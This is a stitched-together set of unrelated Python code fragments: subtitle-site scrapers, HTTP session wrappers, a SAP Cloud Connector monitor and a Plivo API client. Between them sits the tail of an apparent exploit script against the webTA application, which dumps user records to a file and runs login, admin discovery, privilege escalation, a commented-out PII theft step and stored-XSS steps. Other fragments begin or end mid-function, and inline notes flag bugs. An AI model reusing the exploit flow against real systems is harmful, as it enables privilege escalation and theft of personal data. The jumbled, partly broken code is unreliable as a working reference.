            for show in root.findall('data/shows/show'):
                if sanitize(show.find('name').text).lower() == sanitize(
                        series.lower()):
                    show_id = int(show.find('id').text)
                    logger.debug('Found show id %d', show_id)

                    return show_id

            next_page = root.find('data/next')

        # No matches found
        logger.warning('Show id not found: suggestions does not match')

        return None

    def get_show_id(self, series, country_code=None):
        """Get the best matching show id for `series`.

        First search in the result of :meth:`_get_show_ids` and fallback on a search with
        :meth:`_search_show_id`

        :param str series: series of the episode.
        :param str country_code: the country in which the show is aired.
        :return: the show id, if found.
        :rtype: int or None
        """
        series_sanitized = sanitize(series).lower()
        show_ids = self._get_show_ids()
        show_id = None

        # attempt with country
        if not show_id and country_code:
            logger.debug('Getting show id with country')
            show_id = show_ids.get('%s %s' % (series_sanitized, country_code.lower()))

        # attempt clean
        if not show_id:
            logger.debug('Getting show id')
            show_id = show_ids.get(series_sanitized)

        # search as last resort
        if not show_id:
            logger.warning('Series not found in show ids')
            show_id = self._search_show_id(series)

        return show_id

    @region.cache_on_arguments(expiration_time=EPISODE_EXPIRATION_TIME)
    def _download_zip(self, sub_id):
        # download the subtitle (zip archive); requires the authcode from login
        logger.info('Downloading subtitle %r', sub_id)
        params = {
            'authcode': self.auth_code,
            'apikey': self.apikey,
            'subtitle_id': sub_id
        }
        r = self.session.get(self.server_url + 'subtitles/download', params=params, timeout=30)
        r.raise_for_status()

        return r.content

    def _get_season_subtitles(self, show_id, season, sub_format):
        # Fallback used when no per-episode subtitle exists: fetch the
        # whole-season zip and split it into per-episode subtitles.
        params = {
            'apikey': self.apikey,
            'show_id': show_id,
            'q': 'Stagione %%%d' % season,
            'version': sub_format
        }
        r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        if int(root.find('data/count').text) == 0:
            logger.warning('Subtitles for season not found, try with rip suffix')

            params['version'] = sub_format + 'rip'
            r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30)
            r.raise_for_status()
            root = etree.fromstring(r.content)
            if int(root.find('data/count').text) == 0:
                logger.warning('Subtitles for season not found')
                return []

        subs = []
        # Looking for subtitles in first page
        season_re = re.compile('.*?stagione 0*?%d.*' % season)
        for subtitle in root.findall('data/subtitles/subtitle'):
            if season_re.match(subtitle.find('name').text.lower()):
                logger.debug('Found season zip id %d - %r - %r',
                             int(subtitle.find('id').text),
                             subtitle.find('name').text,
                             subtitle.find('version').text)

                content = self._download_zip(int(subtitle.find('id').text))
                if not is_zipfile(io.BytesIO(content)):  # pragma: no cover
                    # NOTE(review): on Python 3 `content` is bytes, so this
                    # substring test against a str would raise TypeError —
                    # confirm the target interpreter version.
                    if 'limite di download' in content:
                        raise TooManyRequests()
                    else:
                        raise ConfigurationError('Not a zip file: %r' % content)

                with ZipFile(io.BytesIO(content)) as zf:
                    episode_re = re.compile('s(\d{1,2})e(\d{1,2})')
                    for index, name in enumerate(zf.namelist()):
                        match = episode_re.search(name)
                        if not match:  # pragma: no cover
                            logger.debug('Cannot decode subtitle %r', name)
                        else:
                            sub = ItaSASubtitle(
                                int(subtitle.find('id').text),
                                subtitle.find('show_name').text,
                                int(match.group(1)),
                                int(match.group(2)),
                                None, None, None, name)
                            sub.content = fix_line_ending(zf.read(name))
                            subs.append(sub)

        return subs

    def query(self, series, season, episode, video_format, resolution, country=None):
        """Search subtitles for a single episode, falling back to season zips.

        :param str series: series name.
        :param int season: season number.
        :param int episode: episode number.
        :param video_format: the video format (e.g. HDTV) used to pick the subtitle version.
        :param resolution: the video resolution (e.g. 720p).
        :param str country: optional country code for show-id disambiguation.
        :return: the matching subtitles (with content already downloaded).
        :rtype: list
        """
        # To make queries you need to be logged in
        if not self.logged_in:  # pragma: no cover
            raise ConfigurationError('Cannot query if not logged in')

        # get the show id
        show_id = self.get_show_id(series, country)
        if show_id is None:
            logger.error('No show id found for %r ', series)
            return []

        # get the page of the season of the show
        logger.info(
            'Getting the subtitle of show id %d, season %d episode %d, format %r',
            show_id, season, episode, video_format)
        subtitles = []

        # Default format is SDTV
        if not video_format or video_format.lower() == 'hdtv':
            if resolution in ('1080i', '1080p', '720p'):
                sub_format = resolution
            else:
                sub_format = 'normale'
        else:
            sub_format = video_format.lower()

        # Look for year
        params = {'apikey': self.apikey}
        r = self.session.get(self.server_url + 'shows/' + str(show_id), params=params, timeout=30)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        year = root.find('data/show/started').text
        if year:
            year = int(year.split('-', 1)[0])
        tvdb_id = root.find('data/show/id_tvdb').text
        if tvdb_id:
            tvdb_id = int(tvdb_id)

        params = {
            'apikey': self.apikey,
            'show_id': show_id,
            'q': '%dx%02d' % (season, episode),
            'version': sub_format
        }
        r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        if int(root.find('data/count').text) == 0:
            logger.warning('Subtitles not found, try with rip suffix')

            params['version'] = sub_format + 'rip'
            r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30)
            r.raise_for_status()
            root = etree.fromstring(r.content)
            if int(root.find('data/count').text) == 0:
                logger.warning('Subtitles not found, go season mode')

                # If no subtitle are found for single episode try to download all season zip
                subs = self._get_season_subtitles(show_id, season, sub_format)
                if subs:
                    for subtitle in subs:
                        subtitle.format = video_format
                        subtitle.year = year
                        subtitle.tvdb_id = tvdb_id

                    return subs
                else:
                    return []

        # Looking for subtitles in first page
        for subtitle in root.findall('data/subtitles/subtitle'):
            if '%dx%02d' % (season, episode) in subtitle.find('name').text.lower():
                logger.debug('Found subtitle id %d - %r - %r',
                             int(subtitle.find('id').text),
                             subtitle.find('name').text,
                             subtitle.find('version').text)

                sub = ItaSASubtitle(
                    int(subtitle.find('id').text),
                    subtitle.find('show_name').text,
                    season,
                    episode,
                    video_format,
                    year,
                    tvdb_id,
                    subtitle.find('name').text)

                subtitles.append(sub)

        # Not in the first page of result try next (if any)
        next_page = root.find('data/next')
        while next_page.text is not None:  # pragma: no cover
            r = self.session.get(next_page.text, timeout=30)
            r.raise_for_status()
            root = etree.fromstring(r.content)

            # NOTE(review): ElementTree elements have no `.data` attribute —
            # this pragma-excluded line would raise AttributeError; it likely
            # should be root.find('data/page').text. Confirm before relying
            # on multi-page results.
            logger.info('Loading subtitles page %r', root.data.page.text)

            # Looking for show in following pages
            for subtitle in root.findall('data/subtitles/subtitle'):
                if '%dx%02d' % (season, episode) in subtitle.find('name').text.lower():
                    logger.debug('Found subtitle id %d - %r - %r',
                                 int(subtitle.find('id').text),
                                 subtitle.find('name').text,
                                 subtitle.find('version').text)

                    sub = ItaSASubtitle(
                        int(subtitle.find('id').text),
                        subtitle.find('show_name').text,
                        season,
                        episode,
                        video_format,
                        year,
                        tvdb_id,
                        subtitle.find('name').text)

                    subtitles.append(sub)

            next_page = root.find('data/next')

        # Download the subs found, can be more than one in zip
        additional_subs = []
        for sub in subtitles:
            # open the zip
            content = self._download_zip(sub.sub_id)
            if not is_zipfile(io.BytesIO(content)):  # pragma: no cover
                # NOTE(review): same bytes-vs-str concern as in
                # _get_season_subtitles — confirm interpreter version.
                if 'limite di download' in content:
                    raise TooManyRequests()
                else:
                    raise ConfigurationError('Not a zip file: %r' % content)

            with ZipFile(io.BytesIO(content)) as zf:
                if len(zf.namelist()) > 1:  # pragma: no cover
                    # One zip can hold several releases: the first becomes the
                    # base subtitle, the rest are deep-copied as extra results.
                    for index, name in enumerate(zf.namelist()):
                        if index == 0:
                            # First element
                            sub.content = fix_line_ending(zf.read(name))
                            sub.full_data = name
                        else:
                            add_sub = copy.deepcopy(sub)
                            add_sub.content = fix_line_ending(zf.read(name))
                            add_sub.full_data = name
                            additional_subs.append(add_sub)
                else:
                    sub.content = fix_line_ending(zf.read(zf.namelist()[0]))
                    sub.full_data = zf.namelist()[0]

        return subtitles + additional_subs

    def list_subtitles(self, video, languages):
        return self.query(video.series, video.season, video.episode,
                          video.format, video.resolution)

    def download_subtitle(self, subtitle):  # pragma: no cover
        # Content is already downloaded during query(); nothing to do here.
        pass
class User(object):
    """Holds user credentials/state and proxies HTTP calls through a single
    requests session.

    Attributes
    ----------
    session : requests.Session
        Shared HTTP session used for all requests made by this user.
    username : str
        Name of the currently logged-in user (None before login).
    logged_in : bool
        Boolean standing for login state. True if logged in.
    """

    def __init__(self):
        super(User, self).__init__()
        self.session = Session()
        self.logged_in = False
        self.username = None

    def __del__(self):
        # Best-effort: close the session when the object is collected.
        try:
            self.session.close()
        except TypeError:
            pass

    def login(self, username):
        """Record the login state and return self for chaining."""
        self.username = username
        self.logged_in = True
        return self

    def logout(self):
        """Clear the login flag."""
        self.logged_in = False

    def check_login(self):
        """Raise AUTHError unless the user is logged in."""
        if self.logged_in is False:
            raise AUTHError('%s is not logged in.' % self.username)

    def post(self, url, **kwargs):
        """Delegate a POST to the underlying session."""
        return self.session.post(url, **kwargs)

    def get(self, url, **kwargs):
        """Delegate a GET to the underlying session."""
        return self.session.get(url, **kwargs)

    @staticmethod
    def check_response(response):
        """Return the decoded JSON body, or raise for a non-OK status."""
        if not response.ok:
            response.raise_for_status()
        return response.json()
# NOTE(review): this chunk starts mid-function — the `def` owning the lines
# below (which write a tab-separated user dump to `filename`) is outside this
# view, so the exact indentation is reconstructed and should be confirmed.
        pass
    count = i  # does not include header
    print("[+] Complete. {} users written to file '{}'".format(
        count, filename))
    print("[+] Sample Content:")
    # Show the first two lines of the dump, converting tabs to commas.
    with open(filename) as f:
        for n in range(2):
            print(",".join(f.readline().split("\t")), end="")


def dumpSysInfo():
    # Query the webTA admin servlet's "about" function and print the
    # version banner scraped from the returned HTML.
    url = base_url + "/servlet/com.threeis.webta.H200mnuAdmin"
    data = {"selFunc": "about"}
    resp = web_req(url, data)
    html = resp.text
    data = re.findall(r'<INPUT VALUE\="(.*?)"', html, re.DOTALL)
    print("[+] " + data[0])


if __name__ == '__main__':
    print(banner)
    login()
    findAdmins()
    privesc()
    login()  # login again because we need the refreshed perms after privesc
    dumpSysInfo()
    # stealPII()
    if xss:
        storeXSS()
    s.close()
class AssrtProvider(Provider):
    """Assrt Provider.

    Searches the Assrt subtitle API using keywords built from the video's
    title/year (movies) or series/season/episode (episodes).

    :param str token: Assrt API token (mandatory).
    """
    languages = {Language(*l) for l in supported_languages}
    video_types = (Episode, Movie)

    def __init__(self, token=None):
        if not token:
            raise ConfigurationError('Token must be specified')
        self.token = token

    def initialize(self):
        self.session = Session()
        self.session.headers = {
            'User-Agent': os.environ.get("SZ_USER_AGENT", "Sub-Zero/2")}

    def terminate(self):
        self.session.close()

    def query(self, languages, video):
        """Query the /sub/search endpoint and return matching subtitles.

        :param languages: set of requested languages.
        :param video: the video (Movie or Episode) to search subtitles for.
        :return: list of :class:`AssrtSubtitle`.
        :rtype: list
        """
        # build the search keywords from the video metadata
        keywords = []
        if isinstance(video, Movie):
            if video.title:
                keywords.append(video.title)
            if video.year:
                keywords.append(str(video.year))
        elif isinstance(video, Episode):
            if video.series:
                keywords.append(video.series)
            if video.season and video.episode:
                keywords.append('S%02dE%02d' % (video.season, video.episode))
            elif video.episode:
                keywords.append('E%02d' % video.episode)
        query = ' '.join(keywords)

        params = {'token': self.token, 'q': query, 'is_file': 1}
        logger.debug('Searching subtitles: GET /sub/search %r', params)
        res = self.session.get(server_url + '/sub/search', params=params,
                               timeout=10)
        res.raise_for_status()
        result = res.json()

        if result['status'] != 0:
            logger.error('status error: %r', result['status'])
            return []

        # parse the subtitles
        pattern = re.compile(r'lang(?P<code>\w+)')
        subtitles = []
        for sub in result['sub']['subs']:
            if 'lang' not in sub:
                continue
            for key in sub['lang']['langlist']:
                match = pattern.match(key)
                if not match:
                    # BUGFIX: the original called match.group() on a None
                    # match and relied on a bare `except` to swallow the
                    # AttributeError; skip non-matching keys explicitly.
                    continue
                try:
                    language = Language.fromassrt(match.group('code'))
                except Exception:
                    # Unknown/unconvertible language code — skip this entry.
                    # (Narrowed from a bare `except:`, which also swallowed
                    # KeyboardInterrupt/SystemExit.)
                    continue
                output_language = search_language_in_list(language, languages)
                if output_language:
                    subtitles.append(
                        AssrtSubtitle(output_language, sub['id'],
                                      sub['videoname'], self.session,
                                      self.token))

        return subtitles

    def list_subtitles(self, video, languages):
        return self.query(languages, video)

    def download_subtitle(self, subtitle):
        r = self.session.get(subtitle.download_link, timeout=10)
        r.raise_for_status()
        subtitle.content = fix_line_ending(r.content)
class OneP_Request:
    """Thin wrapper around a requests ``Session`` for talking to a OneP host."""

    def __init__(self, host, https=True, httptimeout=15, headers=None,
                 reuseconnection=False, log=None, curldebug=False):
        # `headers=None` instead of a mutable `{}` default avoids the classic
        # shared-mutable-default bug; behavior for existing callers is unchanged.
        self.host = ('https://' + host) if https else ('http://' + host)
        self.https = https
        self.httptimeout = httptimeout
        self.headers = {} if headers is None else headers
        self.reuseconnection = reuseconnection
        self.session = Session()
        self.session.headers.update(self.headers)
        self.log = log
        self.curldebug = curldebug

    def request(self, method, path, body=None, headers=None,
                exception_fn=None, notimeout=False, verify=True):
        """Wraps HTTPConnection.request. On exception it calls exception_fn
        with the exception object. If exception_fn is None, it re-raises the
        exception. If notimeout is True, create a new connection (regardless
        of self.reuseconnection setting) that uses the global default timeout
        for sockets (usually None)."""
        if headers is None:
            headers = {}
        # This needs to be done first because self.session may be None
        if not self.reuseconnection or notimeout:
            self.close()
            self.session = Session()
        # Copy before merging so the caller's dict (previously also the shared
        # default dict) is never mutated in place. The merged view is only used
        # for logging; requests itself merges session headers into the request
        # when preparing it, so the wire request is unchanged.
        allheaders = dict(headers)
        allheaders.update(self.session.headers)
        try:
            if self.curldebug:
                # output request as a curl call
                def escape(s):
                    """escape single quotes for bash"""
                    return s.replace("'", "'\\''")
                self.log.debug("curl '{1}{2}' -X {3} -m {4} {5} {6}".format(
                    'https' if self.https else 'http', self.host, path, method,
                    self.httptimeout, ' '.join([
                        '-H \'{0}: {1}\''.format(escape(h),
                                                 escape(allheaders[h]))
                        for h in allheaders
                    ]), '' if body is None else '-d \'' + escape(body) + '\''))
            else:
                self.log.debug("%s %s\nHost: %s\nHeaders: %s" %
                               (method, path, self.host, allheaders))
                if body is not None:
                    self.log.debug("Body: %s" % body)
            URI = self.host + path
            prepped = self.session.prepare_request(
                Request(method, URI, data=body, headers=headers))
            response = self.session.send(
                prepped,
                verify=verify,
                timeout=None if notimeout else self.httptimeout)
            return response.text, response
        except Exception:
            # drop the (possibly broken) connection before reporting
            self.close()
            ex = sys.exc_info()[1]
            if exception_fn is not None:
                exception_fn(ex)
            else:
                raise ex

    def close(self):
        """Closes any open connection. This should only need to be called if
        reuseconnection is set to True. Once it's closed, the connection may be
        reopened by making another API called."""
        if self.session is not None:
            self.session.close()
            self.session = None
def _collect_sapcloudconnector(self):
    """Collect SAP Cloud Connector (SCC) topology and status.

    Probes the SCC monitoring API on port 8443 and, when reachable,
    emits components/relations/events for the connector itself, its
    sub-accounts (tunnels) and its backend connections.
    """
    #
    # Uses monitoring API:
    # https://help.sap.com/viewer/cca91383641e40ffbe03bdc78f00f681/Cloud/en-US/f6e7a7bc6af345d2a334c2427a31d294.html
    #
    # Configuring : Make port 8443 available. add this to users.xml and restart SCC.
    #
    # <user username="******" password="******" roles="sccmonitoring"/>
    #
    # SCC monitoring only speaks HTTPS, hence the scheme rewrite.
    cloud_connector_url = "{0}:{1}/".format(self.url, "8443").replace(
        "http://", "https://")
    self.log.debug(
        "{0}: Trying to connect to sapcloudconnector on url: {1}".format(
            self.host, cloud_connector_url))
    health_url = cloud_connector_url + "exposed?action=ping"
    #
    # 1 second timeout to connect, 30 to read data.
    #
    # NOTE(review): `requests.Session` has no `timeout` attribute — setting it
    # here has no effect; a timeout would have to be passed per `get()` call.
    # Confirm whether the (1, 30) connect/read timeout is actually intended.
    status_code = 0
    session = Session()
    session.auth = HTTPBasicAuth(self.user, self.password)
    session.timeout = (1, 30)
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        # NOTE(review): this probes the root URL, not the `health_url`
        # (".../exposed?action=ping") defined above — verify which endpoint
        # the health check should hit; log lines below mention health_url.
        health = session.get(cloud_connector_url)
        status_code = health.status_code
    except Exception:
        # any connection error is treated as "no SCC present"
        self.log.debug(
            "{0}: No SAP Cloud connector found on url: {1}".format(
                self.host, health_url))
        status_code = 500
    if status_code == 200:
        self.log.info(
            "{0}: Got health from cloud connector on url: {1}".format(
                self.host, health_url))
        external_id = str(self._scc_external_id())
        component_data = {
            "name": "SCC",
            "description": "SAP Cloud Connector",
            # "type": "SAP Cloud Connector",
            # "sid": "SCC",
            "host": self.host,
            # "system_number": "99",
            # "version": "v1",
            "domain": self.domain,
            "environment": self.stackstate_environment,
            "tags": self.tags
            # "labels": []
        }
        self.log.debug("{0}: -----> component_data : {1}".format(
            self.host, component_data))
        self.log.debug("{0}: -----> external_id : {1}".format(
            self.host, external_id))
        self.component(external_id, "sap-cloud-connector", component_data)
        # define relation cloud connector --> host
        # is hosted on
        source_id = external_id
        target_id = self._host_external_id()
        relation_data = {}
        self.relation(source_id, target_id, "is hosted on", relation_data)
        # define scc status event
        self.event({
            "timestamp": int(time.time()),
            "source_type_name": "SAP:scc state",
            # "source_type_name": "SAP:host instance",
            "msg_title": "SCC status update.",
            "msg_text": "",
            "host": self.host,
            "tags": ["instance_id:99", "status:sapcontrol-green"]
        })
        #
        # Lists sub accounts to the SAP Cloud and connection tunnels
        #
        subaccount_url = cloud_connector_url + "api/monitoring/subaccounts"
        subaccount_reply = session.get(subaccount_url)
        if subaccount_reply.status_code == 200:
            reply = subaccount_reply.text.encode('utf-8')
            self.log.debug(
                "{0}: Sub accounts reply from cloud connector : {1}".
                format(self.host, reply))
            subaccounts = json.loads(subaccount_reply.text)
            self.log.debug(
                "{0}: JSON sub accounts from cloud connector : {1}".format(
                    self.host, subaccounts))
            for subaccount in subaccounts["subaccounts"]:
                self.log.debug("{0}: subaccount: {1}".format(
                    self.host, subaccount))
                # define cloud connector component
                subaccount_name = str(subaccount.get("displayName"))
                # display name is not always setup
                # (str(None) == "None" is used as the sentinel here)
                if subaccount_name == "None":
                    subaccount_name = str(subaccount.get("subaccount"))
                external_id = str(
                    self._scc_subaccount_external_id(
                        subaccount.get("subaccount")))
                tunnel = subaccount.get("tunnel")
                component_data = {
                    "name": subaccount_name,
                    "description": str(subaccount.get("description")),
                    "state": str(tunnel.get("state")),
                    "connectedSince": str(tunnel.get("connectedSince")),
                    "connections": str(tunnel.get("connections")),
                    "user": str(tunnel.get("user")),
                    "regionHost": str(subaccount.get("regionHost")),
                    "subaccount": str(subaccount.get("subaccount")),
                    "locationID": str(subaccount.get("locationID")),
                    "layer": "SAP SCC Sub Accounts",
                    "domain": self.domain,
                    "environment": self.stackstate_environment,
                    "host": self.host,
                    "tags": self.tags
                    # "labels": []
                }
                self.log.debug("{0}: -----> component_data : {1}".format(
                    self.host, component_data))
                self.log.debug("{0}: -----> external_id : {1}".format(
                    self.host, external_id))
                self.component(external_id, "sap-scc-subaccount",
                               component_data)
                # define relation cloud connector --> host
                # is hosted on
                source_id = external_id
                target_id = self._scc_external_id()
                relation_data = {}
                self.relation(source_id, target_id, "is_setup_on",
                              relation_data)
                # define cloud connector status event
                tunnel_status = self._scc_subaccount_status(
                    tunnel.get("state"))
                self.event({
                    "timestamp": int(time.time()),
                    "source_type_name": "SAP:scc subaccount state",
                    "msg_title":
                    "SAP Cloud Connector '{0}' status update.".format(
                        subaccount_name),
                    "msg_text": "",
                    "host": self.host,
                    "tags": [
                        "status:{0}".format(tunnel_status),
                        "subaccount_name:{0}".format(subaccount_name)
                    ]
                })
        else:
            if subaccount_reply.status_code == 400:
                # older SCC versions do not expose the sub-account page
                msg = "{0}: SAP Cloud connector monitoring sub account page not " \
                      "supported in this version of SCC.".format(self.host)
                self.log.info(msg)
            else:
                status = subaccount_reply.status_code
                self.log.error(
                    "{0}: No SAP Cloud connector sub account found. Status code: {1}"
                    .format(self.host, status))
        #
        # List backend SAP systems and virtual names.
        #
        backends_url = cloud_connector_url + "api/monitoring/connections/backends"
        backends_reply = session.get(backends_url)
        if backends_reply.status_code == 200:
            reply = backends_reply.text.encode('utf-8')
            self.log.debug(
                "{0}: Backends reply from cloud connector : {1}".format(
                    self.host, reply))
            backends = json.loads(backends_reply.text)
            self.log.info(
                "{0}: JSON backends from cloud connector : {1}".format(
                    self.host, backends))
            for subaccount in backends["subaccounts"]:
                # subaccount["regionHost"]
                # subaccount["subaccount"]
                # subaccount["locationID"]
                virtualbackend = str(subaccount.get("virtualBackend"))
                for backend in subaccount["backendConnections"]:
                    external_id = self._scc_backend_external_id(
                        subaccount["subaccount"], virtualbackend)
                    component_data = {
                        "virtualBackend": virtualbackend,
                        "internalBackend":
                        str(backend.get("internalBackend")),
                        "protocol": str(backend.get("protocol")),
                        "idle": str(backend.get("idle")),
                        "active": str(backend.get("active")),
                        "labels": [],
                        "layer": "SAP SCC Back-ends",
                        "domain": self.domain,
                        "environment": self.stackstate_environment,
                        "tags": self.tags
                    }
                    self.log.debug("{0}: ------> external_id : {1}".format(
                        self.host, external_id))
                    self.component(external_id, "sap-cloud", component_data)
                    # define relation cloud connector --> host
                    # is hosted on
                    source_id = external_id
                    target_id = self._scc_subaccount_external_id(
                        subaccount["subaccount"])
                    relation_data = {}
                    self.relation(source_id, target_id, "is connected to",
                                  relation_data)
                    # NOTE(review): the msg_title below reads
                    # backend["virtualBackend"], while the component above
                    # uses the subaccount-level "virtualBackend" key — confirm
                    # the per-backend key exists in the API payload, otherwise
                    # this raises KeyError.
                    self.event({
                        "timestamp": int(time.time()),
                        "source_type_name": "SAP:cloud component state",
                        "msg_title":
                        "SAP Cloud Connector '{0}' status update.".format(
                            backend["virtualBackend"]),
                        "msg_text": "",
                        "host": self.host,
                        "tags": [
                            "active:{0}".format(backend["active"]),
                            "idle:{0}".format(backend["idle"])
                        ]
                    })
        else:
            if backends_reply.status_code == 400:
                # older SCC versions do not expose the backends page
                msg = "{0}: SAP Cloud connector monitoring backend page not supported " \
                      "in this version of SCC.".format(self.host)
                self.log.info(msg)
            else:
                status = backends_reply.status_code
                self.log.error(
                    "{0}: No SAP Cloud connector backends found. Status code: {1}"
                    .format(self.host, status))
    if status_code == 401:
        msg = "{0}: Authentication failed, check your config.yml and SCC users.xml " \
              "for corresponding username and password.".format(self.host)
        self.log.error(msg)
    session.close()
class BaseClient(object):
    def __init__(self, auth_id=None, auth_token=None, proxies=None, timeout=5):
        """
        The Plivo API client. Deals with all the API requests to be made.
        """
        self.base_uri = PLIVO_API_BASE_URI
        # JSON session for regular API calls
        self.session = Session()
        self.session.headers.update({
            'User-Agent': get_user_agent(),
            'Content-Type': 'application/json',
            'Accept': 'application/json',
        })
        self.session.auth = fetch_credentials(auth_id, auth_token)
        # Separate session for multipart (file upload) calls: it must not
        # force a JSON Content-Type so requests can set the multipart boundary.
        self.multipart_session = Session()
        self.multipart_session.headers.update({
            'User-Agent': get_user_agent(),
            'Cache-Control': 'no-cache',
        })
        self.multipart_session.auth = fetch_credentials(auth_id, auth_token)
        self.proxies = proxies
        self.timeout = timeout

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # release both connection pools
        self.session.close()
        self.multipart_session.close()

    def process_response(self, method, response, response_type=None,
                         objects_type=None):
        """Processes the API response based on the status codes and method used
        to access the API

        :raises ValidationError: on HTTP 400.
        :raises AuthenticationError: on HTTP 401.
        :raises ResourceNotFoundError: on HTTP 404.
        :raises InvalidRequestError: on HTTP 405.
        :raises PlivoServerError: on HTTP 500.
        :raises PlivoRestError: on any other unexpected status code.
        """
        try:
            # wrap every JSON object in a ResponseObject for attribute access
            response_json = response.json(
                object_hook=
                lambda x: ResponseObject(x) if isinstance(x, dict) else x)
            if response_type:
                r = response_type(self, response_json.__dict__)
                response_json = r
            if 'objects' in response_json and objects_type:
                response_json.objects = [
                    objects_type(self, obj.__dict__)
                    for obj in response_json.objects
                ]
        except ValueError:
            # body was not JSON; fall back to status-code handling only
            response_json = None

        if response.status_code == 400:
            if response_json and 'error' in response_json:
                raise ValidationError(response_json.error)
            # fixed: a space was missing between the two fragments, producing
            # "...resourceat: <url>"
            raise ValidationError(
                'A parameter is missing or is invalid while accessing resource '
                'at: {url}'.format(url=response.url))

        if response.status_code == 401:
            if response_json and 'error' in response_json:
                raise AuthenticationError(response_json.error)
            raise AuthenticationError(
                'Failed to authenticate while accessing resource at: '
                '{url}'.format(url=response.url))

        if response.status_code == 404:
            if response_json and 'error' in response_json:
                raise ResourceNotFoundError(response_json.error)
            raise ResourceNotFoundError(
                'Resource not found at: {url}'.format(url=response.url))

        if response.status_code == 405:
            if response_json and 'error' in response_json:
                raise InvalidRequestError(response_json.error)
            raise InvalidRequestError(
                'HTTP method "{method}" not allowed to access resource at: '
                '{url}'.format(method=method, url=response.url))

        if response.status_code == 500:
            if response_json and 'error' in response_json:
                raise PlivoServerError(response_json.error)
            raise PlivoServerError(
                'A server error occurred while accessing resource at: '
                '{url}'.format(url=response.url))

        if method == 'DELETE':
            # DELETE is expected to answer 204 No Content
            if response.status_code != 204:
                raise PlivoRestError('Resource at {url} could not be '
                                     'deleted'.format(url=response.url))
        elif response.status_code not in [200, 201, 202]:
            raise PlivoRestError(
                'Received status code {status_code} for the HTTP method '
                '"{method}"'.format(
                    status_code=response.status_code, method=method))
        return response_json

    def create_request(self, method, path=None, data=None):
        """Build a prepared request on the JSON session; the auth id is the
        first path segment after the base URI."""
        path = path or []
        req = Request(method, '/'.join([self.base_uri, self.session.auth[0]] +
                                       list([str(p) for p in path])) + '/',
                      **({
                          'params': data
                      } if method == 'GET' else {
                          'json': data
                      }))
        return self.session.prepare_request(req)

    def create_multipart_request(self, method, path=None, data=None,
                                 files=None):
        """Build a prepared request on the multipart session; `files` is only
        attached when it carries a non-empty 'file' entry."""
        path = path or []
        data_args = {}
        if method == 'GET':
            data_args['params'] = data
        else:
            data_args['data'] = data
        if files and 'file' in files and files['file'] != '':
            data_args['files'] = files
        req = Request(method,
                      '/'.join([self.base_uri, self.multipart_session.auth[0]]
                               + list([str(p) for p in path])) + '/',
                      **(data_args))
        return self.multipart_session.prepare_request(req)

    def send_request(self, request, **kwargs):
        # the caller may route through a specific session (e.g. multipart);
        # default to the JSON session
        session = kwargs.pop('session', self.session)
        return session.send(
            request, proxies=self.proxies, timeout=self.timeout, **kwargs)

    def request(self, method, path=None, data=None, response_type=None,
                objects_type=None, files=None, **kwargs):
        """Make an API request and return the processed response."""
        if files is not None:
            req = self.create_multipart_request(method, path, data, files)
            session = self.multipart_session
        else:
            req = self.create_request(method, path, data)
            session = self.session
        kwargs['session'] = session
        res = self.send_request(req, **kwargs)
        return self.process_response(method, res, response_type, objects_type)
class SubsSabBzProvider(Provider):
    """SubsSabBz Provider."""
    languages = {Language('por', 'BR')} | {Language(l) for l in [
        'bul', 'eng'
    ]}

    def initialize(self):
        self.session = Session()
        # random browser-like user agent plus standard browser headers to
        # avoid being served a blocked/alternate page
        self.session.headers['User-Agent'] = AGENT_LIST[randint(0, len(AGENT_LIST) - 1)]
        self.session.headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        self.session.headers["Accept-Language"] = "en-US,en;q=0.5"
        self.session.headers["Accept-Encoding"] = "gzip, deflate, br"
        self.session.headers["DNT"] = "1"
        self.session.headers["Connection"] = "keep-alive"
        self.session.headers["Upgrade-Insecure-Requests"] = "1"
        self.session.headers["Cache-Control"] = "max-age=0"

    def terminate(self):
        self.session.close()

    def query(self, language, video):
        """Search subs.sab.bz and return subtitles for `language`/`video`."""
        subtitles = []
        is_episode = isinstance(video, Episode)

        params = {
            'act': 'search',
            'movie': '',
            'select-language': '2',
            'upldr': '',
            'yr': '',
            'release': ''
        }

        if is_episode:
            params['movie'] = "%s %02d %02d" % (sanitize(video.series), video.season, video.episode)
        else:
            params['yr'] = video.year
            params['movie'] = video.title

        if language == 'en' or language == 'eng':
            params['select-language'] = 1

        logger.info('Searching subtitle %r', params)
        response = self.session.post('http://subs.sab.bz/index.php?', params=params, allow_redirects=False, timeout=10, headers={
            'Referer': 'http://subs.sab.bz/',
        })
        response.raise_for_status()

        if response.status_code != 200:
            logger.debug('No subtitles found')
            return subtitles

        soup = BeautifulSoup(response.content, 'html.parser')
        rows = soup.findAll('tr', {'class': 'subs-row'})

        # Search on first 10 rows only
        for row in rows[:10]:
            a_element_wrapper = row.find('td', {'class': 'c2field'})
            if a_element_wrapper:
                element = row.find('a')
                if element:
                    link = element.get('href')
                    logger.info('Found subtitle link %r', link)
                    subtitles += self.download_archive_and_add_subtitle_files(link, language, video)
        return subtitles

    def list_subtitles(self, video, languages):
        return [s for l in languages for s in self.query(l, video)]

    def download_subtitle(self, subtitle):
        # content is filled in while processing the archive during query()
        pass

    def process_archive_subtitle_files(self, archiveStream, language, video):
        """Extract .srt/.sub members of an archive into subtitle objects."""
        subtitles = []
        # renamed from `type`: do not shadow the builtin
        video_type = 'episode' if isinstance(video, Episode) else 'movie'
        for file_name in archiveStream.namelist():
            if file_name.lower().endswith(('.srt', '.sub')):
                logger.info('Found subtitle file %r', file_name)
                subtitle = SubsSabBzSubtitle(language, file_name, video_type)
                subtitle.content = archiveStream.read(file_name)
                subtitles.append(subtitle)
        return subtitles

    def download_archive_and_add_subtitle_files(self, link, language, video):
        """Download the (rar/zip) archive at `link` and extract subtitles."""
        logger.info('Downloading subtitle %r', link)
        request = self.session.get(link, headers={
            'Referer': 'http://subs.sab.bz/index.php?'
        })
        request.raise_for_status()

        archive_stream = io.BytesIO(request.content)
        if is_rarfile(archive_stream):
            return self.process_archive_subtitle_files(RarFile(archive_stream), language, video)
        elif is_zipfile(archive_stream):
